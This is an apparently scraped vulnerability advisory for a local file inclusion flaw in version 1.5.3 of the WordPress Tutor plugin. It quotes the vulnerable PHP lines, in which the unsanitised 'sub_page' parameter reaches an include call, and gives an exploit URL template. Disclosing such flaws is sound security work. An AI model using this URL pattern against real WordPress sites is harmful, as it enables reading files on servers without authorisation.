Wordpress Plugin tutor.1.5.3 - Local File Inclusion

2020.02.12
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[-] Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion [-] Author: mehran feizi [-] Category: webapps [-] Date: 2020.02.12 =================================================================== Vulnerable page: /instructors.php =================================================================== Vulnerable Source: 3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET); 5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php"; 7: include include $include_file; requires: 4: if(!empty($sub_page)) 6: if(file_exists($include_file)) =================================================================== Exploit: localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI] ================================================================================= contact me: telegram: @MF0584 gmail: mehranfeizi13841384@gmail.com


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top